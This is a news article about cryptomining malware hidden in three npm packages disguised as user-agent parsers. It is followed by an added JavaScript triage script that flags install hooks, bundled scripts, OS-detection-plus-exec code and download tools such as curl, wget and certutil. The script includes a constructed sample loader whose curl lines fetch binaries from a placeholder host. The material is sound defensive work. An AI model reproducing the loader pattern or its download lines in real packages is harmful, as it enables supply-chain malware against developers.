[TheRecord] Crypto-miner found hidden inside three npm libraries

DevOps security firm Sonatype has uncovered crypto-mining malware hidden inside three JavaScript libraries uploaded to the official npm package repository.

The three files, disguised as user-agent string parsers, would detect the user’s operating system and then run a BAT or Shell script, based on the victim’s platform.

“These scripts then download an externally-hosted EXE or a Linux ELF, and execute the binary with arguments specifying the mining pool to use, the wallet to mine cryptocurrency for, and the number of CPU threads to utilize,” said Sonatype security researcher Ali ElShakankiry, who discovered the campaign.

This campaign’s specifics include:

- The names of the three npm packages were: klow, klown, okhsa.
- The packages were live only for a day, on October 15.
- None of the three libraries were downloaded more than 150 times, individually.
- The final payloads (cryptominers) could run on Windows or Linux platforms.
- All three packages were uploaded from the same account.

The number of malicious packages uploaded to the npm repository has been rising, but this is a good sign rather than a bad one: it is a byproduct of companies like Snyk and Sonatype constantly monitoring new uploads and package updates for malicious code, catching miscreants before they do more damage and before their packages are downloaded thousands of times in real-world projects.
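
The behaviour described above (OS detection, then a bundled BAT or shell script that downloads a binary) can be screened for before a dependency is installed. The following is an added example, not code from Sonatype or from the article; the function name, the indicator patterns, the install-hook check and both sample packages are assumptions constructed for illustration.

```javascript
// Added example: heuristic triage of an unpacked npm package.
// `files` maps relative path -> file text; all sample data below is constructed.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];
const SCRIPT_EXT = /\.(bat|cmd|sh)$/i;
const PLATFORM_CHECK = /os\.platform\(\)|process\.platform/;
const SPAWN = /child_process|\b(?:exec|execFile|spawn)(?:Sync)?\s*\(/;
const DOWNLOAD = /\b(?:curl|wget|certutil|bitsadmin|Invoke-WebRequest)\b/i;

function triagePackage(files) {
  const findings = [];
  // Assumption: install-time lifecycle hooks are worth flagging; the article
  // does not say how the scripts in this campaign were triggered.
  const scripts = JSON.parse(files['package.json'] || '{}').scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (scripts[hook]) findings.push(`install hook ${hook}: ${scripts[hook]}`);
  }
  for (const [path, text] of Object.entries(files)) {
    if (SCRIPT_EXT.test(path)) {
      // A "user-agent parser" has no reason to ship BAT or shell scripts.
      findings.push(`bundled script: ${path}`);
      if (DOWNLOAD.test(text)) findings.push(`download command in ${path}`);
    } else if (/\.[cm]?js$/.test(path) && PLATFORM_CHECK.test(text) && SPAWN.test(text)) {
      // OS detection plus process execution is the loader shape described above.
      findings.push(`platform check plus process spawn in ${path}`);
    }
  }
  return findings;
}

// Constructed sample: a package shaped like the behaviour described above.
const suspectPackage = {
  'package.json': JSON.stringify({ name: 'example-ua-parser', scripts: { preinstall: 'node loader.js' } }),
  'loader.js': "const { exec } = require('child_process');\n" +
    "exec(process.platform === 'win32' ? 'run.bat' : 'sh run.sh');",
  'run.bat': 'curl -s -O https://example.invalid/placeholder.exe',
  'run.sh': 'curl -s -O https://example.invalid/placeholder.bin',
};
// Constructed sample: a parser that only inspects strings.
const benignPackage = {
  'package.json': JSON.stringify({ name: 'example-plain-parser', scripts: { test: 'node test.js' } }),
  'index.js': "module.exports = ua => (/Windows/.test(ua) ? 'win32' : process.platform);",
};

console.log(triagePackage(suspectPackage));
console.log(triagePackage(benignPackage));
```

Matches are leads for manual review rather than verdicts: the benign sample reads `process.platform` without spawning anything and produces no findings.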

The post Crypto-miner found hidden inside three npm libraries appeared first on The Record by Recorded Future.
